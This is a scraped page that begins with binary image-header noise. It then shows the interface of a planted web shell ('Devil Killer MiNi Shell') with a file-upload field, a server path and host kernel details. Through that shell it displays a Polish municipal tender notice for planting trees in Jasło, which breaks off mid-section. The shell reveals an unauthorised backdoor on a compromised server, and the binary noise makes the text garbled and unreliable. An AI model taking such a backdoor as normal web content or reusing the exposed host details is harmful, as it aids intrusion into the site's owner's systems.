JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241009/0053852001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nasadzenie nowych drzew oraz wymiana istniejących w złym stanie biologicznym w ramach projektu pn. „Zielono-niebieska infrastruktura w Jaśle” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Jasło</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wzp@um.jaslo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://um.jaslo.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nasadzenie nowych drzew oraz wymiana istniejących w złym stanie biologicznym w ramach projektu pn. „Zielono-niebieska infrastruktura w Jaśle” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46b30c48-bc85-4dbf-9391-32815354c3d6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00538520</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00091172/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.17 „Nasadzenie nowych drzew oraz wymiana istniejących w złym stanie biologicznym ” w ramach projektu pn. „Zielono – niebieska infrastruktura w Jaśle”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Fundusze Europejskie dla Polski Wschodniej 2021-2027 współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://um-jaslo.logintrade.net/zapytania_email,177614,92e549adffccfc1682293c7d438b6f14.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://um-jaslo.logintrade.net/rejestracja/rejestracja.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2.	Środkiem komunikacji elektronicznej, służącym złożeniu oferty, wymianie informacji oraz przekazywaniem dokumentów lub oświadczeń przez Wykonawcę, jest ich prawidłowe złożenie na Platformie dostępnej pod adresem https://um-jaslo.logintrade.net/rejestracja/rejestracja.html <br/>w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem. Korzystanie z Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>3.	Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Miasta Jasła: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. <br/>4.	Osoby uprawnione do porozumiewania się z wykonawcami: Sławomir Maćkoś.<br/>5.	Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej Miasta Jasła<br/>Dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/>Pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet<br/>•	zainstalowana wtyczka flash - flash player - dotyczy kupca<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – Ajar<br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•	zainstalowany Acrobat Reader<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/>•	dla Windows Vista: Internet Explorer 8, Internet Explorer 9<br/>•	dla Windows 7: Internet Explorer 9, Internet Explorer 11<br/>•	dla Windows 8: Internet Explorer 11<br/>•	dla Windows 10: Internet Explorer 11<br/>Wspierane są rozwiązania dostarczane przez firmy:<br/>•	Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>•	Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>•	Powszechne Centrum Certyfikacji Certum firmy Asseco Data Systems S.A.<br/>•	Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.<br/>Dopuszczalne formaty przesyłanych danych:<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FE.042.31.2.2024:7</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> . Przedmiotem zamówienia jest dostawa oraz nasadzenie 128 szt. drzew na wybranych terenach zielonych miasta Jasła, w tym usunięcie 30 szt. istniejących drzew będących w złym stanie biologicznym wraz z późniejszą pielęgnacją posadzonych drzew w okresie gwarancji. Minimalny okres gwarancji wynosi: 36 miesięcy (kryterium oceny ofert).<br/>Gatunki drzew, ich wielkość, lokalizacja sadzenia oraz sposób zabezpieczenia zostały określone <br/>w tabeli poniżej: <br/><br/>Wykaz drzew do posadzenia<br/>Lp.	Lokalizacja (miejsce posadzenia drzewa)	Gatunek (nazwa / odmiana)	Parametry drzew	Ilość [szt.]<br/>1	ul. Szkolna<br/>(pas zieleni (trawnik) wzdłuż ulicy pomiędzy chodnikiem a drogą)	Jabłoń ozdobna ‘Malus’	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	36<br/>2	ul. Sikorskiego (pas zieleni (trawnik) wzdłuż ulicy pomiędzy chodnikiem a drogą)	Jabłoń ozdobna ‘Malus’	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	16<br/> Jarząb szwedzki	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	6<br/>3	Trakt pieszo- rowerowy łączący ulice: Sikorskiego z Krasińskiego	Robinia akacjowa ‘Umbraculifera’	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	32<br/><br/>4	ul. 3 Maja (na odcinku od skrzyżowania z ul. Staszica do skrzyżowania z ul. Chopina; pas zieleni (trawnik) wzdłuż ulicy pomiędzy chodnikiem a drogą)	Głóg pośredni	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	14<br/>5	ul. Jana Pawła II (w chodniku przed blokiem nr 2)	Lipa srebrzysta ‘Brabant’	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową<br/>Uwaga: w ramach posadzenia drzew należy rozebrać kostkę brukową chodnika<br/>i przygotować odpowiednie misy pod sadzone drzewo.	4<br/>6	Teren rekreacyjny Przystanek Kwiatowa (przy ul. Kwiatowej)	Brzoza pożyteczna	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	10<br/> Wierzba biała	obwód pnia na wys. 100 cm min. 18-20 cm, pojemnik min. 40 l lub zwarta bryła korzeniowa o min. 0 40 cm zabezpieczona siatką metalową i/lub tkaniną jutową	10<br/>Razem	128<br/><br/>2.	Zakres przedmiotu zamówienia obejmuje:<br/>1)	dostawa oraz nasadzenie 128 szt. drzew na wybranych terenach zielonych miasta Jasła,<br/>2)	usunięcie 30 szt. istniejących drzew będących w złym stanie biologicznym,<br/>3)	w celu zabezpieczenia sieci podziemnych przed przerastaniem i uszkodzeniem przez systemy korzeniowe drzew, w miejscach newralgicznych należy zastosować ekrany przeciwkorzenne dot. drzew przy ul. Jana Pawła II,<br/>4)	do bezpiecznej stabilizacji drzew w gruncie należy zastosować paliki drewniane, przestrzeń między połowicami wyścielona warstwą kory mielonej lub zrębka o grubości 5 cm,<br/>5)	dla zapewnienia dobrego zaopatrzenia drzew w wodę, należy zastosować worki do podlewania drzew, służące do kropelkowego nawadniania gruntu wokół drzew. Do każdego posadzonego drzewa należy zamontować podwójny worek, który przy średnicy pnia około (16 cm) może pomieścić min. 150 wody) łącznie w obydwóch workach). W przypadku braku opadów w okresie wegetacyjnym worki te należy napełniać wodą z odpowiednią częstotliwością.<br/>6)	w celu zabezpieczenia drzew należy wykonać konstrukcję drewnianą spinającą paliki przy pomocy połowic min. trzy rzędy w przyziemnej części) o jeden rząd w górnej części,<br/>7)	po wykonaniu nasadzeń drzew należy odtworzyć zniszczone, bądź uszkodzone nawierzchnie trawnikowe w pasie drogowym,<br/>8)	przez cały okres gwarancyjny Wykonawca jest odpowiedzialny za żywotność i rozwój drzew oraz prawidłowy stan wszystkich elementów zabezpieczeń. Do obowiązków Wykonawcy w okresie gwarancji należy podejmowanie wszelkich działań wymaganych i koniecznych do utrzymania i prawidłowego rozwoju nasadzeń, zgodnie z wiedzą ogrodniczą.<br/>3.	Wymagania dotyczące materiału roślinnego:<br/>1)	drzewa szkółkowane min. 4 razy,<br/>2)	pień drzewa prosty, bez uszkodzeń,<br/>3)	korona drzewa prawidłowa, regularna we wszystkich kierunkach,<br/>4)	drzewa mają być w I wyborze,<br/>5)	drzewa mają być z dobrze ukształtowaną koroną, bryła korzeniowa ma wypełniać całą objętość pojemnika, bryła korzeniowa ma być zdrowa, wilgotna i nieuszkodzona,<br/>6)	drzewa mają być zdrowe (bez oznak chorób, bez szkodników i śladów ich żerowania),<br/>7)	drzewa mają być bez uszkodzeń mechanicznych, niedopuszczalne jest złamanie wierzchołka przewodnika, pędów bocznych,<br/>8)	drzewa w ramach danego gatunku dostarczane w jednej dostawie mają być jednolite pod względem wielkości i sposobu uformowania,<br/>9)	pędy boczne korony mają być równomiernie rozmieszczone,<br/>10)	nie dopuszcza się wykopywania materiału szkółkarskiego i umieszczania w pojemnikach przed dostawą (musza być zaadoptowane w pojemnikach),<br/>11)	każde drzewo powinno posiadać oznaczenie etykietę z nazwą gatunku i odmiany.<br/>Wymagania jakościowe dla materiału roślinnego zgodnie z normą PN-R-67023 „Materiał szkółkarski. Ozdobne drzewa i krzewy liściaste” oraz „Zalecenia jakościowe dla ozdobnego materiału szkółkarskiego” wydane przez Związek Szkółkarzy Polskich.<br/>4.	Transport materiału roślinnego:<br/>1)	Wykonawca ponosi koszty transportu i rozładunku materiału roślinnego,<br/>2)	Wykonawca własnym transportem dostarczy materiał roślinny i rozładuje własnymi siłami na terenie lokalizacji nasadzenia,<br/>3)	Wykonawca zabezpieczy rośliny w czasie transportu przed uszkodzeniami i niekorzystnymi warunkami atmosferycznymi,<br/>4)	Rozładunek materiału roślinnego polega na wypakowaniu roślin oraz rozłożeniu ich w sposób pozwalający na jego ocenę pod względem jakościowym i ilościowym,<br/>5)	Wykonawca winien dostarczyć materiał roślinny na teren lokalizacji, na którym Komisja w składzie Zamawiającego i Wykonawca dokona szczegółowej kwalifikacji dostarczonego materiału roślinnego. Miejsce, termin dostawy oraz ilość poszczególnych partii drzew z wyszczególnieniem gatunków Wykonawca winien uzgodnić na bieżąco z Zamawiającym. W trakcie kwalifikacji materiału roślinnego może zostać spisany protokół, w którym zostanie określone czy drzewa zostały zaakceptowane przez Zamawiającego.<br/><br/>5.	Wymagania dotyczące sadzenia drzew:<br/>1)	nasadzenia drzew zgodnie ze sztuką ogrodniczą,<br/>2)	drzewa należy wysadzić w specjalnie przygotowane doły o średnicy min. dwukrotnie większej od średnicy bryły korzeniowej z pełną wymianą ziemi,<br/>3)	jeżeli po zdjęciu donicy na powierzchni bryły korzenie tworzą gęstą, splątaną, zbitą siatkę, należy je delikatnie rozluźnić,<br/>4)	korzenie, które przy rozluźnianiu zostaną przypadkowo złamane lub uszkodzone należy przyciąć,<br/>5)	wszystkie rośliny sadzimy w doły z pełną wymianą ziemi,<br/>6)	koszt zakupu ziemi oraz koszty transportu należy doliczyć do ceny oferty. Ziemię rodzimą i darń pochodzącą z wyrównywania powierzchni rabat i wybraną z dołów Oferent usuwa i zagospodaruje we własnym zakresie,<br/>7)	podczas sadzenia ziemię wokół brył korzeniowych roślin należy prawidłowo ubić (nie uszkadzając bryły i korzeni), obficie podlać,<br/>8)	nie dopuszcza się zagęszczania gruntu sprzętem budowlanym,<br/>9)	wysadzone drzewa należy zabezpieczyć poprzez:<br/>a)	zastosowanie na każde drzewo 3 palików o średnicy 6 cm z wiązaniem górnym podwójnym (sztywnym i miękkim) oraz dolnym (sztywnym) wykonanych z 3 warstw połowic toczonych montowanych na dole stosując 1-2 cm przerwy między połowicami. Wiązanie górne sztywne należy również wykonać z połowic,<br/>b)	elementy opalikowania nie mogą dotykać (uszkadzać) drzew,<br/>10)	ziemia pod roślinami (pomiędzy palikami) powinna być wysypana warstwą kory lub zrębka,<br/>11)	szczegółowe lokalizacje nasadzeń zostaną wskazane Wykonawcy przez Zamawiającego,<br/>12)	uporządkowanie terenu po wykonaniu nasadzeń.<br/>6.	Odpowiedzialność za żywotność i rozwój drzew oraz prawidłowy stan wszystkich elementów zabezpieczeń w okresie gwarancyjnym<br/>1)	nawożenie drzew w okresie wiosennym z zastosowaniem mieszanki nawozów mineralnych,<br/>2)	podlewanie drzew - uzupełnianie wody w workach w okresie bezdeszczowej pogody,<br/>3)	cięcia w koronie drzew w celu ich prawidłowego uformowania, dotyczy to głównie zachowania skrajni jezdni (w przypadku wystąpienia takiej potrzeby),<br/>4)	kontrola i poprawa (wymiana) drewnianych konstrukcji zabezpieczających drzewa przed uszkodzeniami mechanicznymi,<br/>5)	pielęgnacja gleby przy pniu i uzupełnianie warstwy kory / zrębka,<br/>6)	prewencyjne i doraźne zabiegi ochrony roślin przed patogenami chorobotwórczymi,<br/>7)	poprawa mocowania brył korzeniowych (w przypadku pochylania się drzew).<br/>Wykonawca zobowiązany jest prowadzić dziennik prac, w którym dokonywać będzie wpisu w każdym dniu pracy wyszczególniając datę, zakres wykonanych prac, teren na jakim zostały wykonane prace, warunki meteorologiczne, inne uwagi wg. potrzeb i ustaleń z Zamawiającym.<br/>7.	Wykaz materiału roślinnego<br/>Lp.	Wyszczególnienie	Jedn.	Ilość<br/>1	Jabłoń ozdobna	szt.	52<br/>2	Jarząb szwedzki	szt.	6<br/>3	Robinia akacjowa	szt.	32<br/>4	Głóg pośredni	szt.	14<br/>5	Lipa srebrzysta	szt.	4<br/>6	Brzoza pożyteczna	szt.	10<br/>7	Wierzba biała	szt.	10<br/>Razem	128 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77211600-8 - Sadzenie drzew</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja żywotności roślin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Szkolenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający 